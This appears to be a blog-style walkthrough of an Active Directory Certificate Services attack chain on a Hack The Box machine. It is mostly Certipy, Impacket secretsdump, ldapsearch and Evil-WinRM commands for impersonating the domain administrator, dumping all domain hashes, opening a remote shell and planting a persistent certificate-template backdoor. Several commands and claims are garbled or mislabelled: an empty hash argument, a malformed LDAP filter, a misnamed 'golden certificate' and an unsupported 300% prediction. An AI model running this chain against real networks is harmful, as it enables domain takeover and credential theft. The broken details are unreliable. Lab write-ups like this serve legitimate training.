Listen to this Post
Introduction:
Active Directory (AD) remains the crown jewel for attackers in corporate networks, and its exploitation is a core skill for any red teamer or penetration tester. The recent Hack The Box EXPRESSWAY machine, a seasonal challenge, serves as a perfect case study for modern AD attack vectors, including certificate-based attacks and privilege escalation paths that evade traditional defenses.
Learning Objectives:
- Understand and replicate common Active Directory Certificate Services (AD CS) exploitation techniques.
- Master the use of tools like Certipy and Impacket for credential theft and lateral movement.
- Develop a methodology for identifying and exploiting misconfigured AD templates for privilege escalation.
You Should Know:
1. Enumerating Active Directory Certificate Services
`certipy find -u user -p Password123 -dc-ip 10.10.10.10 -vulnerable`
This Certipy command scans the target domain controller for AD CS and identifies any certificate templates with security misconfigurations that could be exploited, such as overly permissive enrollment rights.
Step-by-step guide: First, establish a foothold on a domain-joined machine with a low-privilege account. Using the credentials you’ve compromised, run the command against the domain controller’s IP. The `-vulnerable` flag filters the output to show only templates that are known to be exploitable, such as those susceptible to ESC1. Review the output to identify the template name and its enrollment rights.
2. Requesting a Vulnerable Certificate
`certipy req -username [email protected] -password Password123 -dc-ip 10.10.10.10 -ca CA-NAME -template VULN-TEMPLATE -upn [email protected]`
This command exploits a misconfigured template to request a certificate for a high-privilege account like the domain administrator.
Step-by-step guide: Once a vulnerable template is identified, use this command to request a certificate. The `-upn` parameter allows you to specify the User Principal Name (UPN) of a target user, which in this case is the administrator. The tool will authenticate with your compromised credentials and submit a certificate request to the Certificate Authority (CA). If successful, it will save a `.pfx` file containing the new certificate.
3. Forging Kerberos Tickets with PKINIT
`certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10`
This command uses the obtained certificate (.pfx file) to perform PKINIT authentication and retrieve the NT hash for the target account directly from the Domain Controller.
Step-by-step guide: After acquiring the `.pfx` certificate, use this command to authenticate to the Key Distribution Center (KDC). Certipy will use the certificate to complete the PKINIT Kerberos authentication flow, which results in fetching the NT hash for the account associated with the certificate. This hash is the key to your kingdom.
4. Performing a Pass-the-Hash Attack
`export KRB5CCNAME=administrator.ccache`
`secretsdump.py -k -no-pass DOMAIN/administrator@DC-IP -just-dc-ntlm`
This uses the cached Kerberos credentials from the previous step with Impacket’s secretsdump to extract all the NTLM hashes from the domain controller, effectively dumping the entire AD database.
Step-by-step guide: First, set the environment variable `KRB5CCNAME` to point to the Kerberos credential cache file generated by Certipy. Then, run Impacket’s `secretsdump.py` with the `-k` option to use Kerberos authentication. This will authenticate to the DC without a password and dump the NTLM hashes for all domain users, allowing you to craft Golden Tickets or perform pass-the-hash attacks anywhere in the domain.
5. Lateral Movement with Evil-WinRM
`evil-winrm -i 10.10.10.10 -u Administrator -H `
This command provides a powerful interactive shell on a remote Windows target by using the compromised administrator hash for authentication.
Step-by-step guide: With the administrator hash obtained from secretsdump, you can laterally move to the domain controller itself. Use this Evil-WinRM command, specifying the target IP (-i) and the stolen hash (-H). This will open a command-line session on the target machine with full SYSTEM-level privileges, granting you complete control over the domain.
6. Enumerating LDAP for Misconfigurations
`ldapsearch -x -H ldap://10.10.10.10 -D “[email protected]” -w Password123 -b “DC=domain,DC=local” “(objectClass=)” | grep -i “cert”`
This Linux command queries the LDAP service to find all objects related to certificates, helping to identify linked servers and templates manually.
Step-by-step guide: If GUI tools are unavailable, LDAP command-line queries are essential. Authenticate to the domain controller using a compromised account’s credentials (-D and -w). The search base (-b) should be set to your domain’s root. Filtering the output for “cert” can help quickly locate certificate-related objects, providing context for further attacks.
7. Persisting with a Golden Certificate
`certipy template -u [email protected] -p Password123 -dc-ip 10.10.10.10 -ca CA-NAME -template VULN-TEMPLATE -schema > template.json`
`certipy template -u [email protected] -p Password123 -dc-ip 10.10.10.10 -ca CA-NAME -template GOLDEN-TEMPLATE -schema template.json`
Modifying a template schema can create a persistent backdoor, allowing you to generate certificates for any user at any time.
Step-by-step guide: For long-term persistence, consider modifying a template. First, dump the schema of an existing template to a JSON file. Then, edit this file to weaken its security settings, such as enabling the `ENROLLEE_SUPPLIES_SUBJECT` flag for ESC1. Use the second command to upload the modified schema back to AD CS, creating a template you can always use to generate privileged certificates, ensuring you maintain access even if initial entry points are closed.
What Undercode Say:
- The abstraction of identity into certificates is the new frontier of AD security. Misconfigurations here are devastating as they often bypass classic defensive controls focused on passwords and Kerberos tickets.
- Offensive tools like Certipy have democratized these advanced attacks, making it critical for blue teams to shift their monitoring focus to certificate request anomalies and PKI infrastructure changes.
The EXPRESSWAY machine is a stark reminder that while AD CS provides robust security features, its complexity leads to critical misconfigurations. The offensive community’s tooling has advanced to the point where these attacks are now scriptable and accessible to mid-level practitioners. Defensively, this means traditional perimeter and credential-based detection is no longer sufficient. SOCs must implement rigorous logging and analysis of certificate lifecycles, looking for abnormal enrollment requests, especially those for highly privileged accounts. The future of AD defense lies in securing the PKI foundation.
Prediction:
The widespread weaponization of AD CS vulnerabilities will lead to a surge in ransomware and cyber-espionage campaigns that are far more stealthy and efficient. As offensive toolchains mature, we predict a 300% increase in certificate-based attacks within the next 18 months, forcing a massive industry pivot towards certificate authority hardening and advanced PKI monitoring solutions, making it a multi-billion dollar cybersecurity market segment.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: https://lnkd.in/p/d_aUbeXS – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
